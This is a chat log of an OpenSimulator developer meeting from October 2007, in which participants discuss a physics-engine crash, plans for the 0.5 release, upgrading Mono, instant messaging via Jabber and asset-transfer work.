5.5.x and Perl 5.8.x don't suffer from this limitation. If you have a functionality that you could imagine being in this module, please drop me a line. This module's policy will be less strict than List::Util's when it comes to additions as it isn't a core module. When you report bugs, it would be nice if you could additionally give me the output of your program with the environment variable LIST_MOREUTILS_PP set to a true value. That way I know where to look for the problem (in XS, pure-Perl or possibly both). Bugs should always be submitted via the CPAN bug tracker. Credits go to a number of people: Steve Purkis for giving me namespace advice and James Keenan and Terrence Branno for their effort of keeping the CPAN tidier by making List::Utils obsolete. Brian McCauley suggested the inclusion of apply() and provided the pure-Perl implementation for it. Eric J. Roode asked me to add all functions from his module List::MoreUtil into this one. With minor modifications, the pure-Perl implementations of those are by him. The bunch of people who almost immediately pointed out the many problems with the glitchy 0.07 release (Slaven Rezic, Ron Savage, CPAN testers). A particularly nasty memory leak was spotted by Thomas A. Lowery. Lars Thegler made me aware of problems with older Perl versions. Anno Siegel de-orphaned each_arrayref(). David Filmer made me aware of a problem in each_arrayref that could ultimately lead to a segfault. Ricardo Signes suggested the inclusion of part() and provided the Perl-implementation. Robin Huston kindly fixed a bug in perl's MULTICALL API to make the XS-implementation of part() work. A pile of requests from other people is still pending further processing in my mailbox. This includes: Allow List::MoreUtils to pass-through the regular List::Util functions to end users only need to use the one module. Use code-reference to extract a key based on which the uniqueness is determined. Suggested by Aaron Crane. These were all suggested by Dan Muey. Always return a flat list when either a simple scalar value was passed or an array-reference. Suggested by Mark Summersault..
http://search.cpan.org/~adamk/List-MoreUtils/lib/List/MoreUtils.pm
CC-MAIN-2014-52
refinedweb
645
64.71
One of the most exciting starter activities to do with a Raspberry Pi is something you can't do on your regular PC or laptop—make something happen in the real world, such as flash an LED or control a motor. If you've done anything like this before, you probably did it with Python using the RPi.GPIO library, which has been used in countless projects. There's now an even simpler way to interact with physical components: a new friendly Python API called GPIO Zero. Photo by Giles Booth. Used with permission I recently wrote about Raspberry Pi Zero, the $5 computer and latest edition to the world of affordable hardware. Although the names are similar, the GPIO Zero and Raspberry Pi Zero projects are unrelated and are not coupled. The GPIO Zero library is made to work on all Raspberry Pi models, and is compatible with both Python 2 and Python 3. The RPi.GPIO library is bare bones and provides all the essential functionality to do simple things with the Pi's GPIO pins—set up pins as inputs or outputs, read inputs, set outputs high or low, and so on. GPIO Zero is built on top of this and provides a collection of simple interfaces to everyday components, so rather than setting pin 2 high to turn on an LED, you have an LED object and you turn it on. GPIO port label – from rasp.io/portsplus Getting started With GPIO Zero, you import the name of the interfaces you're using, for example: from gpiozero import LED Also you must correctly wire up any components you're using and connect them to the GPIO pins. Note that some pins are allocated to 3V3, 5V, and GND; a few are special purpose and the rest are general purpose. Refer to pinout.xyz for more information, or use a port label: Blink an LED with the following code: from gpiozero import LED from time import sleep led = LED(17) while True: led.on() sleep(1) led.off() sleep(1) Alternatively, use the LED's blink() method, but make sure to keep the program alive with signal.pause() like so: from gpiozero import LED from signal import pause led = LED(17) led.blink() pause() Output devices As well as a basic LED interface, with the methods on(), off(), toggle(), and blink(), GPIO Zero also provides classes for Buzzer and Motor, which work in a similar way: from gpiozero import Buzzer, Motor from time import sleep buzzer = Buzzer(14) motor = Motor(forward=17, backward=18) while True: motor.forward() sleep(10) motor.backward() buzzer.beep() sleep(10) buzzer.off() There also are interfaces for PWMLED (control the brightness rather than just on/off), and for RGB LED, which is an LED comprising red, green, and blue parts using the brightness of each to provide full color control. There's even an interface for TrafficLights. Provide the pin numbers the red, amber, and green lights are connected to, then control with: lights = TrafficLights(2, 3, 4) lights.on() lights.off() lights.blink() lights.green.on() lights.red.on() and so on. Input devices The simplest input device is a push button, and the interface provided makes it easy to control programs with button presses: from gpiozero import Button button = Button(14) while True: if button.is_pressed: print("Pressed") Another way to use button pressed to control programs is to use wait_for_press: button.wait_for_press() print("pressed") This halts the program until the button is pressed, then continues. Alternatively, rather than polling the button state, you can connect actions to button presses: button.when_pressed = led.on button.when_released = led.off Here, the method led.on is passed in as the action to be run when the button is pressed, and led.off as the button is released. This means when the button is pressed, the LED comes on, and when it's released the LED goes off. In addition to using other GPIO Zero object methods, you can use custom functions: def hello(): print("Hello") def bye(): print("Bye") button.when_pressed = hello button.when_released = bye Now every time the button is pressed, the hello function is called and prints "Hello". When the button is released it prints "Bye". The use of custom functions in this way can be a good way to run a set of GPIO instructions, such as a traffic lights sequence: def sequence(): lights.green.off() lights.amber.on() sleep(1) lights.amber.off() lights.red.on() sleep(20) lights.amber.on() sleep(1) lights.green.on() lights.amber.off() lights.red.off() lights.green.on() button.when_pressed = sequence Now when the button is pressed, the traffic lights will go from green to red, then wait 20 seconds before turning back to red, in the usual way. Sensors Swapping out a button for another input device, such as a basic sensor, can open up a world of interesting projects. Instead of a button, use a motion sensor: from gpiozero import MotionSensor sensor = MotionSensor(15) Then use sensor.if_motion, sensor.wait_for_motion, and sensor.when_motion. There is a similar interface provided for LightSensor. Analogue devices The Raspberry Pi has no native analogue input pins, but you can easily connect up an ADC (analogue-to-digital converter) and access analogue input devices (such as potentiometers) and read their value: from gpiozero import MCP3008 pot = MCP3008() while True: print(pot.value) The potentiometer returns values from 0 to 1, which means you can connect them up to output devices easily: from gpiozero import PWMLED, MCP3008 led = PWMLED(4) pot = MCP3008() while True: led.value = pot.value Now the LED's brightness is controlled directly by the potentiometer value. Alternatively, a clever feature of GPIO Zero allows you to directly connect two devices together without continuously updating inside a loop. Every output device has a source property, which can read an infinite generator of values. All devices (input and output) have a values property, which is an infinite generator, yielding the device's current value at all times: from gpiozero import PWMLED, MCP3008 led = PWMLED(4) pot = MCP3008() led.source = pot.values This works exactly the same as the previous example, just without the need for a while loop. You can connect multiple analogue inputs to the same ADC (the MCP3008 chip provides 8 channels). This example uses three potentiometers allowing control of each color channel in an RGB LED using the same method: This allows you to use the three potentiometers as a color mixer for the RGB LED. Bundle interfaces Like the TrafficLights interface, there are others for bundles of components, particularly for use in commonly used simple add-on boards. Generic LED board or collection of LEDs, controlled together or individually: from gpiozero import LEDBoard lights = LEDBoard(2, 3, 4, 5, 6) lights.on() lights.off() lights.leds[1].on() lights.leds[3].toggle() lights.leds[5].on() lights.leds[2].blink() lights.leds[4].blink() The Ryanteck TrafficHAT: from gpiozero import TrafficHat hat = TrafficHat() hat.on() hat.off() hat.lights.blink() hat.buzzer.on() hat.button.when_pressed = hat.lights.on hat.button.when_released = hat.lights.off Note that the TrafficHat interface did not require a set of pin numbers, because they are already defined within the class. Connect up two motors and make a chassis and you have yourself a Raspberry Pi robot: from gpiozero import Robot robot = Robot(left=(4, 14), right=(17, 18)) robot.forward() robot.backward() robot.reverse() robot.left() robot.forward() robot.stop() Zero all the things Now that there's a suite of Zero-named projects, why not use them in conjunction? How about a Pi Zero-powered robot programmed with GPIO Zero and PyGame Zero? GPIO Zero and PyGame Zero do work very well together—perfect for creating on-screen interfaces for GPIO components. Photo by ItsAll_Geek2Me. Used with permission. Try it now! GPIO Zero has been included in the Raspbian Jessie image since December, so you can grab a copy from raspberrypi.org/downloads. If you have an older image, install it with: sudo apt-get update sudo apt-get install python3-gpiozero python-gpiozero Open up IDLE and prototype in the REPL, or create a file to save your scripts. You can also use the regular Python shell, or install IPython and use that. More Read more about GPIO Zero: - Full documentation on readthedocs - GPIO Zero source on GitHub - GPIO Zero in The MagPi #39 - GPIO Zero: Developing a new friendly Python API for Physical Computing on bennuttall.com - Getting Started with GPIO Zero learning resource - GPIO Zero introduction on raspi.tv - RasP.iO Pro HAT Kickstarter—perfect for GPIO Zero - Keeping Physical computing simple—by Giles Booth - GPIO Zero: By George, I think I've got it—by Mike Horne 3 Comments Great read Ben! This is a great resource for educators and any makers! Thank you for this it is a great set of resources. great job :) good article
https://opensource.com/education/16/2/programming-gpio-zero-raspberry-pi
CC-MAIN-2017-17
refinedweb
1,490
53.41
Re: simple gsub question \' \` what? - From: Rob Biedenharn <Rob@xxxxxxxxxxxxxxxxxxxxxx> - Date: Sat, 31 Mar 2007 07:31:12 +0900 On Mar 30, 2007, at 5:39 PM, Timothy Hunter wrote: Dustin Anderson wrote:Sorry for the simple question, I just can't figure this out after aI'd use two calls to split:... irb(main):001:0> string = 'column-1:block-0,block-2,block-1,block-3' => "column-1:block-0,block-2,block-1,block-3" irb(main):002:0> string1, s = string.split(':') => ["column-1", "block-0,block-2,block-1,block-3"] irb(main):003:0> string1 => "column-1" irb(main):004:0> string2 = s.split(',') => ["block-0", "block-2", "block-1", "block-3"] irb(main):005:0> You could probably turn that into a one-liner but that's just golfing. Here's a bit of "live" code that does the same thing (plus .to_f on the elements before turning them into a Vector, but you can knock that part out yourself) def add line id, vals = line.split(/:\s*/, 2) @labels << id @data << Vector[*(vals.split(',').map {|v| v.to_f})] end Note that the second arg (2) to split is important if a ':' can occur anywhere in your block-N parts. Of course, you just need vals.split (',') -Rob Rob Biedenharn Rob@xxxxxxxxxxxxxxxxxxxxxx . - References: - simple gsub question \' \` what? - From: Dustin Anderson - Re: simple gsub question \' \` what? - From: Timothy Hunter - Prev by Date: Re: What is wrong in my script? - Next by Date: Re: New presentation on Ruby - Previous by thread: Re: simple gsub question \' \` what? - Next by thread: What is wrong in my script? - Index(es):
http://newsgroups.derkeiler.com/Archive/Comp/comp.lang.ruby/2007-03/msg04175.html
crawl-002
refinedweb
272
76.22
Tuesday of this past week I decided I would give myself a long over due refresher course in C++. So I started with the tutorials and when I got to Linked Lists I got stuck and a practice program I was writing. The program compiles and runs, but when I type the word done in it doesn't continue on to printing out the list it asks for another inventory item.The program compiles and runs, but when I type the word done in it doesn't continue on to printing out the list it asks for another inventory item.Code:#include <iostream> using namespace std; struct node { char *Inv; node *pNext; node *pPrev; }; node *pHead; node *pTail; void AddNode( node *pNode); int main() { char *temp; node *list; while (temp != "done") { cout<<"Enter inventory item: "; cin>>temp; cin.ignore(); list = new node; list->Inv=temp; AddNode(list); } cout<<"\n\n\n...Ready to print inventory\n\n"; for (list = pHead;list != NULL;list = list->pNext) { cout<<list->Inv; } } void AddNode( node *pNode) { if ( pHead == NULL ) { pHead = pNode; pNode->pPrev = NULL; } else { pTail->pNext = pNode; pNode->pPrev = pTail; } pTail = pNode; pNode->pNext = NULL; } Any ideas?
http://cboard.cprogramming.com/cplusplus-programming/70318-linked-list-problems.html
CC-MAIN-2014-15
refinedweb
194
69.41
Hello, I am just learning c++ and I'm trying to create heap-based objects. In the destructor of the class, I must delete the object from the heap. My question is: How can I delete the heap objects that I put into a vector? For example: this is a Sample class. This class has a vector called myVector and Testing is another object. I get this error while compiling:I get this error while compiling:Code://File: Sample.cc #include <string> #include <vector> #include "Testing.h" using namespace std; Sample::Sample() {} Sample::~Sample() { for (int i=0; i<myVector.size(); i++) { delete myVector[i]; } } void Sample::sampleMethod(string myValue) { Testing *t; //create an new Testing object, t, on the heap t = new Testing(); t->setValue(myValue); //set the value of t myVector.push_back(*t); //put t into a vector } Sample.cc: In method `Sample::~Sample()': Sample.cc:11: type `class Testing' argument given to `delete', expected pointer Does anyone know what is wrong? How can I delete the objects in the vector? Thanks alot!
http://cboard.cprogramming.com/cplusplus-programming/18552-destructor-help.html
CC-MAIN-2014-23
refinedweb
175
59.6
As with any C program, program execution always begins with a function named main. The load module containing the main function must remain in memory at all times. Each subordinate (dynamically loaded) load module must contain a function named _dynamn (which is a contraction for dynamic main). From the perspective of the compiler, the _dynamn function serves the same role in the subordinate load module as main serves in the module containing the main program. mainfunction, or which can cause the C environment to be created in conjunction with using the indepcompiler option. A dynamically loadable module is one which contains a _dynamnfunction. It is not possible to create a load module which is of both types. Any attempt to do so will fail at link time or at execution time. Two consequences of this requirement are: mainfunction and a _dynamnfunction into the same load module. In particular, this means that you cannot have a source file which includes both these functions. indepoption into a load module which includes a _dynamnfunction. mainprogram module can be loaded by use of the loadmand unloadmfunctions. The second argument to loadmis a pointer to a function pointer in which the address of the loaded _dynamnroutine will be stored. In addition to loadm and unloadm, the library provides functions to load and unload modules containing only data ( loadd and unloadd ) and a function that converts a load module entry point address to a function pointer ( buildm). Two other functions, addsrch and delsrch, are provided, primarily for CMS, to define the load module search order. The search order consists of the possible locations of dynamically loaded modules and the order in which they are processed. Before any of these routines can be used, the source program must include the header file <dynam.h> using the #include statement. Transfers of control between load modules are possible only by using function pointers. However, through the use of appropriate pointers, a routine in one load module can call a routine in any other load module. The inability of one load module to call another directly is a special case of a more general restriction; namely, load modules cannot share external variables. More precisely, two external variables (or functions) of the same name in different load modules are independent of each other. (There are a few special cases such as the variable errno, which contains the number of the most recent run-time problem.) See Appendix 4, "Sharing extern Variables among Load Modules," in the SAS/C Compiler and Library User's Guide, Fourth Edition for additional information. An external variable or function can be accessed directly only by functions that have been linked in that module. All functions in other modules can gain access to them only by use of pointers. The functions for dynamic loading, especially addsrch and delsrch, are highly operating-system-dependent. The definition of each dynamic-loading function highlights aspects of the function that depend in some way on the operating system. addsrch and delsrch , for example, are of interest to users working under MVS only when a program needs to be portable to CMS. For CMS, these functions are quite useful but are not needed typically in an MVS environment. #include <dynam.h> SEARCH_P addsrch(int type, const char *loc, const char *prefix); addsrchadds a "location" to the list of "locations" from which modules can be loaded. This list controls the search order for load modules loaded via a call to loadm. The search order can be described additionally by the third argument, prefix. The first argument type must be a module type defined in <dynam.h>. The module type defines what type of module is loaded and varies from operating system to operating system. The character string specified by the second argument loc names the location. The format of this string depends on the module type. The third argument prefix is a character string of no more than eight characters. addsrch is of interest primarily to CMS users and to MVS users writing programs portable to CMS. The remainder of this discussion, therefore, focuses on the use of addsrch under CMS. loadmis called. loadmis called. The module type also controls the format of the second argument loc, which names the location to be searched by loadm. If the module type is "". All location strings may have leading and trailing blanks. The characters are uppercased. addsrch does not verify the existence of the location. The third argument is a character string of no more than eight characters. It may be "". If it is not null, then it specifies that the location indicated is searched only if the load module name (as specified by the first argument to loadm) begins with the same character or characters specified in the third argument. At C program initialization, a default location, defined by the following call, is in effect: sp = addsrch(CMS_LDLB, "DYNAMC *",""); addsrchreturns a value that can be passed to delsrchto delete the input source. Under CMS, this specifically means a value of the defined type SEARCH_P, which can be passed to delsrchto remove the location from the search order. If an error occurs, a value of 0is returned. addsrchare defined only under CMS. The use of addsrchunder MVS with a CMS module type has no effect. addsrchdoes not verify that a location exists (DYNAMC LOADLIB, for example) or that load modules may be loaded from that location. The loadmfunction searches in the location only if the load module cannot be loaded from a location higher in the search order. addsrchfails only if its parameters are ill-formed. #include <dynam.h> SEARCH_P mylib; . . . /* Search for modules in a CMS LOADLIB. */ mylib = addsrch(CMS_LDLB, "PRIVATE *", ""); #include <dynam.h> void buildm(const char *name, __remote /* type */ (**fpp)(), const char *ep); buildmconverts the entry point address in epto a __remotefunction pointer. The created function pointer can then be used to transfer control to a function or module located at this address. buildmis normally used to generate a function pointer for a C load module that has been loaded without the assistance of the SAS/C Library (for instance, by issuing the MVS LOAD SVC), but it can also be used with a non-C load module or with code generated by the program. buildmalso assigns a load module name to the entry point address, and use of this name in subsequent calls to loadmor unloadmis recognized as referring to the address in ep. Note that a load module processed with buildmshould always include a _dynamnfunction. buildm stores the function pointer in the area addressed by fpp. Note that fpp may reference a function returning any valid type of data. If the function pointer cannot be created, a NULL value is stored. name points to a name to be assigned to the built load module. If name is "", then a unique name is assigned by buildm. If the name is prefixed with an asterisk, then buildm does not check to see if the name is the name of a previously loaded module (see "ERRORS", below). buildmstores the function pointer in the area addressed by fpp. If an error occurs, buildmstores NULLin this area. namedoes not start with an asterisk and is the same as a previously built or dynamically loaded module, the request is rejected unless the value of epis the same as the entry point of the existing load module. If the entry points are the same, a pointer to the previously loaded or built module is stored in the area addressed by func. nameargument must point to a null-terminated string no more than eight characters long, not counting a leading asterisk. Leading and trailing blanks are not allowed. The fpp argument must be a pointer to an object declared as "pointer to function returning (some C data type)". The example assumes that SIMPLE is a C _dynamn function returning void. #include <svc.h> #include <code.h> #include <stdio.h> #define LOAD(n,ep) (_ldregs(R0+R1,n,0),_ossvc(8), _stregs(R0,ep)) main() { void (*fp)(); char *ep; /* The name "SIMPLE" must be uppercased, left-adjusted, */ /* and padded to eight characters with blanks when */ /* used by SVC 8. */ LOAD("SIMPLE ",&ep); /* The name passed to buildm does not have to match */ /* the name of the loaded module, but it helps. */ buildm("simple",&fp,ep); if (fp) /* If no errors, call SIMPLE */ (*fp)(); else puts("simple didn't load."); } #include <dynam.h> void delsrch(SEARCH_P sp); delsrchremoves the "location" sppointed to by the argument from the load module search order list. spis a value returned previously by addsrch. delsrchis not portable. delsrchis used primarily in a CMS environment as a counterpart to addsrchor by MVS programs that can port to CMS. delsrchunder CMS: #include <dynam.h> SEARCH_P source; char *new_source; . . . /* Delete old search location. */ if (source) delsrch(source); /* Add new search location. */ source = addsrch(CMS_LDLB, new_source, ""); #include <dynam.h> void loadd(const char *name, char **dp, MODULE *mp); loaddis similar to loadm(load executable module) except that it is intended for data modules. loaddloads the module named by the argument nameand stores the address of the load module's entry point in the location pointed to by the second argument dp. If the module has been loaded already, the pointer returned in the second argument points to the previously loaded copy. If the module name in the first argument string is prefixed with an asterisk, a private copy of the module is loaded. The third argument addresses a location where a value is stored that can be used later to remove the module from memory via unloadd. loadd should be used only to load modules that contain data (for example, translation tables) rather than executable code. loaddindirectly returns a value that is stored in the location addressed by the third argument mp. This value can be used later to remove the module from memory via unloadd. If the module to be loaded cannot be found, 0is returned. loaddmust contain at least 16 bytes of data following the entry point, or library validation of the module may fail. loaddis not portable. As with other dynamic-loading functions, be aware of system-specific requirements for the location of modules to be loaded. loaddnecessarily varies from operating system to operating system. Under MVS, modules to be loaded must reside in STEPLIB. loadd: #include <dynam.h> #include <lcstring.h> char *table; char *str; MODULE tabmod; /* Load a translate table named LC3270AE. */ loadd("LC3270AE",&table,&tabmod); str = strxlt(str, table); unloadd(tabmod); /* Unload module after use.*/ #include <dynam.h>; void loadm(const char *name, __remote /* type */ (**fpp)()); loadmloads an executable module named by the argument string nameand stores a C function pointer in the location pointed to by the argument fpp. If the module has been loaded already, the pointer stored in fpppoints to the previously loaded copy. If the module name in the first argument string is prefixed with an asterisk, a private copy of the module is loaded. Note that fppmay reference a function returning any valid type of data. loadmprovides an indirect return value in the form of a function pointer that addresses the entry point of the loaded module. If the module is in C, calling the returned function always transfers control to the _dynamnfunction of the module. If the module to be loaded cannot be found, a NULL is stored in the location addressed by fpp.mis not portable. Be aware of system dependencies involving where load modules may be located and how module names are specified for your operating system. loadmnecessarily varies from operating system to operating system. Under MVS, modules to be loaded must reside in STEPLIB, a task library,. addsrchdoes not verify the existence of a location, for example, DYNAMC LOADLIB. Because in some circumstances the logic of a program may not require that a location be searched, no verification is done until loadmcannot find a load module in any location defined earlier in the search order. addsrchfails only if its parameters are ill-formed. If loadm determines that a location is inaccessible (for example, the LOADLIB does not exist), the location is marked unusable, and no attempt is made to search it again. loadmis illustrated by three examples. The first demonstrates the use of the command for a very simple situation without operating-system dependencies, while second and third examples are designed to run under MVS and CMS respectively. The second example creates a dynamic load module that includes a table of pointers to functions which may be called dynamically from the calling load module. This example runs under MVScompiler option to override the default assignment of _dynamnas the section name. It may be compiled as re-entrant using the rentcompiler option. (Note that JCL changes are required if norentcompilation // neptune. #include <stdio.h> void neptune(char *p) { puts(p); return; }STEP I. Make the function neptuneinto, Fourth Edition for more information about the snamecompiler option. LKED NEPTUNE (LIBE DYNAMC NAME NEPTUNEis required. If you use some other filename for the LOADLIB, specify it in a call to addsrchbefore. #include <dynam.h>; void unloadd(MODULE mp); unloaddunloads the data module identified by the argument mp. If the module is no longer in use, it deletes the module from memory. unloaddis invalid, a user 1211 ABEND is issued. Various other ABENDs, such as 1215 or 1216, may occur during unloaddif library areas used by dynamic loading have been overlaid. loadd. #include <dynam.h> void unloadm(__remote /* type */ (*fp)()); unloadmunloads the executable module containing the function addressed by the argument fp. If the module is no longer in use, unloadmdeletes it from memory. Note that fpmay reference a function ruturning any valid type of data. unloadm may be used to unload a module that has been built by buildm, but unloadm will not delete the module from memory. unloadmis invalid, a user 1211 ABEND is issued. Various other ABENDs, such as 1215 or 1216, may occur during unloadmif library areas used by dynamic loading have been overlaid. unloadm: #include <dynam.h> int (*fp)(); /* Load a load module named "IEFBR14", */ /* call it, and unload it. */ loadm("iefbr14",&fp); (*fp)(); unloadm(fp); Copyright (c) 1998 SAS Institute Inc. Cary, NC, USA. All rights reserved.
http://support.sas.com/documentation/onlinedoc/sasc/doc/lr2/lrv2ch1.htm
CC-MAIN-2019-22
refinedweb
2,365
55.95
This is my first question on Stack Oveflow, so forgive me if I do something wrong. I've been using Python for a few months. I'm trying to make a simple GUI. I came across EasyGUI. When i try to import the module, i get an error: Traceback (most recent call last): File "C:/Users/matthewr/PycharmProjects/testing start/Tsting.py", line 1, in <module> import easygui File "C:\Users\matthewr\AppData\Local\Programs\Python\Python35-32\lib\site-packages\easygui\__init__.py", line 50, in <module> from .boxes.choice_box import choicebox File "C:\Users\matthewr\AppData\Local\Programs\Python\Python35-32\lib\site-packages\easygui\boxes\choice_box.py", line 76 except Exception, e: ^ SyntaxError: invalid syntax import easygui Try easygui 0.96.0 I've been using easygui for some time but I had exactly the same problem today on a new machine with a fresh install of 3.5.2 with easygui 0.98.0. However, easygui 0.96.0 works for me. pip uninstall easygui pip install easygui==0.96.0
https://codedump.io/share/oXVtRGmD6M6v/1/cannot-import-easygui-module
CC-MAIN-2017-51
refinedweb
175
62.44
Chat log from the meeting on 2007-10-23 From OpenSimulator first part of meeting log, was lost [10:25] cfk say, ODE INTERNAL ERROR 1: assertion "bNormalizationResult" failed in _dNormalize4() [../../include/ode/odemath.h] [10:25] nebadon say, yea [10:25] nebadon say, somone was flying around [10:25] nebadon say, smashing into every prim on the server [10:25] Neas Bade: ok, back now [10:25] You: back [10:25] Nebadon Izumi: nice quick recovery [10:26] Charles Krinkeb: Sorry about that, had a little ODE INTERNAL ERROR 1: assertion "bNormalizationResult" failed in _dNormalize4() [../../include/ode/odemath.h] [10:26] You: back [10:26] Sakai openlifegrid: ah everyone died... [10:26] You: where were we? [10:26] Nebadon Izumi: ya server crashed [10:26] You: have we lost the chat log? [10:26] Charles Krinkeb: 0.5 features, I think. [10:26] Nebadon Izumi: yes [10:26] Nebadon Izumi: probably Tleides [10:27] Nebadon Izumi: unless someone has chat log enabled [10:27] Neas Bade: we were discussing release. I think that at this point we should start building the roadmap [10:27] Sakai openlifegrid: last i heard was.. hsitory should be in the client [10:27] Nebadon Izumi: only if you turn it on Sakai [10:27] Charles Krinkeb: Who should be point on the roadmap, Neas? [10:27] Sakai openlifegrid: yes [10:27] Nebadon Izumi: and i dont have it on [10:27] You: maybe we can pull it of IRC? [10:27] Nebadon Izumi: yea [10:27] Wright Juran: that will teach me to write long messages, wrote a long reply and the server was gone when I pressed send [10:27] Nebadon Izumi: irc has it [10:27] Neas Bade: there is some stuff I put in there after the last meeting, but there is clearly a lot of other things we need [10:28] You: ok, the reason why I am for a small feature set in 0.5 is a goal of releasing frequently [10:28] Charles Krinkeb: I'll take care of the chat log after the meeting from the irc backup. [10:28] danx danx0r: did everyone crash or just me? [10:28] Nahona Nakamori: excuse me, completly out of the subject but can i give you two entry to remove from sim db ? [10:28] You: but in a way you could say we release 4-5-6 times a day [10:28] Nahona Nakamori: excuse me, completly out of the subject but can i give you two entry to remove from sim db ? [10:29] You: the region server crashed [10:29] Sakai openlifegrid: hehe yes and i build them everyday! [10:29] Wright Juran: yeah but with 0.5 I think we always knew and said it would be a big release with a lot of work done, so we can get the foundations of grid mode done [10:29] Neas Bade: I think the problem with that is that there is a bunch of interconnected issues around grid that don't lend themselves to small incremental right now [10:29] Wright Juran: and I'm 100% for that [10:29] Charles Krinkeb: I think feature requests are appropriate as Mantis entries. This is more of a strategic meeting. [10:30] Wright Juran: ++ to Neas Bades comments, [10:30] Neas Bade: he, btw IM is "funny" right now [10:30] Charles Krinkeb: Mw. If gridmode needs to break for weeks or months, Please do what you need to do and we will support you. [10:30] Sakai openlifegrid: yes IM is crossing the names [10:30] Sakai openlifegrid: in the display [10:30] Wright Juran: Charles, err grid mode is broke :) [10:30] Charles Krinkeb: Lets not use IM [10:31] Nebadon Izumi: hehe yea [10:31] Charles Krinkeb: Understood. [10:31] You: I think most of the server backends can be done incrementally [10:31] Wright Juran: so are we saying that Adam's IM module doesn't work? [10:31] danx danx0r: my issue is the reports of sporadic ODE crashes [10:31] Neas Bade: it doesn't display names correctly [10:32] danx danx0r: I can't fix that unless I get crash reports [10:32] Neas Bade: I'll look into it later [10:32] You: why not build on top of jabber? [10:32] danx danx0r: and then I'll probably have to add some debugging and get another crash to really nail it down [10:32] Blue Mouse: yes, please jabber [10:32] Nebadon Izumi: one problem danx is the ode exceptions dont say much [10:32] Charles Krinkeb: Mw: If you need me to change my strategy on inviting new sims and new users onto OSGrid, just tell me what you need that to be like and I will accomodate your. [10:32] Nebadon Izumi: its always the same error [10:32] Charles Krinkeb: desires. [10:32] Wright Juran: we have talked about using jabber before [10:33] Neas Bade: well, Tleiades, I think that the way to resolve your point of view with some of the other points of view is to get lots of code in the tree to mature it faster :) [10:33] Wright Juran: and for IM's that has been the plan, just hard finding a c# jabber server that we could modify [10:33] Neas Bade: we did a core group vote of confidence as we got close to the release last time, which happened a month after the original date was set [10:33] Blue Mouse: could we write a quick shim that connects to the jabber.org server? [10:33] You: sean .. I do try, but I have a daytime job, and a family as well :) [10:33] Neas Bade: yep, I understand :) [10:33] danx danx0r: neb, I haven't gotten a crash from you or charles in over a week, since 0.9 ODE fix [10:34] Blue Mouse: that was actually a question more intended to question license & distro issues [10:34] danx danx0r: if I get a report, I will add debugging info around that part of the code [10:34] Wright Juran: if we want releases often, then we can do 0.4.X releases and even introduce some grid improvement features into them, just think 0.5 should wait [10:34] danx danx0r: so next crash will be more verbose [10:34] Nebadon Izumi: i havent crashe dDan [10:34] Nebadon Izumi: ODE crashing has virtually stopped for me [10:34] Charles Krinkeb: WP just crashed with ODE INTERNAL ERROR 1: assertion "bNormalizationResult" failed in _dNormalize4() [../../include/ode/odemath.h] , Dan [10:34] Sakai openlifegrid: we saw a fair bit of it last week... [10:34] Nebadon Izumi: i know this server is running Mono 1.3.2? [10:35] Nebadon Izumi: im wondering if mono is contributing to problems here [10:35] Nebadon Izumi: yea thats the standard ODE crash [10:35] Nebadon Izumi: pretty much [10:35] Nebadon Izumi: rarely do you get much more than that [10:35] Neas Bade: so, lets try to turn this around to things that need attention in the next week [10:35] Charles Krinkeb: no. mono-1.2.3.1 [10:35] Nebadon Izumi: ah yea [10:35] You: my reason for wanting a quick release, is based on "release frequently" [10:36] Neas Bade: 1) IM is funny, I'll sign up to try to fix that by next week [10:36] danx danx0r: thx charles [10:36] You: but since we - in a way - release 4-5-6 times a day, in svn, I have come to agree with the longer target for 0.5 [10:36] lmmz say, I just upgraded my regions to mono 1.2.5. After some trouble upgrading, it seems to work fine. [10:36] Neas Bade: 2) Physics, obviously needs some love [10:36] Wright Juran: I'll sign up to try to get time to make a start on the asset module (that sends the data to the client) but still a busy time for me so can't promise it by next week [10:37] Charles Krinkeb: Mw, Neas? I will need some guidance on when you will feel comfortable moving beyond mono-1.2.3.1. Perhaps a list of recommended versions we are dependent on would be helpful? [10:37] Sakai openlifegrid: well if a longer target date means a more stable envorinment I think it's worth it [10:37] Neas Bade: is there something that can be done to help debug that [10:37] lmmz say, Adam says that mono 1.2.3 has known issues. [10:37] You: by next week, I plan to have a transfer of assets from the asset server to the region server [10:37] Neas Bade: I've gone to 1.2.4 on everything as that's what's in gutsy [10:37] Nebadon Izumi: im using 1.2.5.1 on all of my servers [10:37] Tleiades Hax is on gutsy too [10:37] Neas Bade: Wright Juran: yeh, not so much asking for people to say "this will be done by next week" [10:38] Charles Krinkeb: Should I plan on updating the UGAS for OSGrid to mono-1.2.4? [10:38] Neas Bade: but more just "here are some things people will look at" [10:38] Neas Bade: progress is made as best it can be [10:38] Nebadon Izumi: charles i thik that would be very good [10:38] lmmz say, My regions are on FF with forced 1.2.5. [10:38] Wright Juran: making 0.5 a target release of sometime this year, is really in opensim terms sticking to release often, as our first release (0.4) took what 8 months? [10:38] Charles Krinkeb: I need mw's opinion, I know everyone elses. [10:38] You: ok .. I plan to introduce a generic REST client, which can be reused to query rest servers [10:38] Neas Bade: :) [10:38] Neas Bade: great tleiades [10:39] Neas Bade: danx0r what kind of help do you need on the physics front? [10:39] Wright Juran: Charles, opinion on mono? I think the others are in a better position to say, as they use mono more than me [10:40] You: I think it is safe to move mono requirements up to 1.2.4, now gutsy has been released [10:40] Neas Bade: also, some of the other folks here on IBM are looking at helping to fill out the LSL implementation. No promisses on speed, as it is all free time stuff, but hopefuly more patches from folks like Illumious coming [10:40] You: I remember we discussed the fact that ubuntu was stuck on 1.2.3 [10:40] Charles Krinkeb: If no one objects, I will begin heading in the direction of updating OSGrid from mono-1.2.3.1 to mono-1.2.4 over the next week or so. [10:40] Neas Bade: yeh, 1.2.4 is probably recommended new version [10:40] Charles Krinkeb: If no one objects, I will begin heading in the direction of updating OSGrid from mono-1.2.3.1 to mono-1.2.4 over the next week or so. [10:40] Nebadon Izumi: very good [10:40] Neas Bade: sounds good cfk [10:40] Wright Juran: sounds good [10:40] Nebadon Izumi: i think thats great charles [10:41] lmmz say, sounds good! [10:41] Neas Bade: danx0r you still in world? [10:41] Nebadon Izumi: also since Rookiie is here we should acknowledge his really amazing Grid Web Interface [10:41] Neas Bade: oh, another thing, MW posted a great glossary explanation on the mailing list [10:41] Nebadon Izumi: he really did a great job [10:42] Charles Krinkeb: Does the top 10 bug list on the wiki make sense to everyone? Add to it as appropriate. But, only 10 on the list max. [10:42] Nebadon Izumi: [10:42] lmmz say, Great job, Rookiie! [10:42] Neas Bade: is there a volunteer to build a glossary in the wiki based on that post? [10:42] Neas Bade: yes, great job on opensimwi [10:42] You: I love the top 10 bug list [10:42] 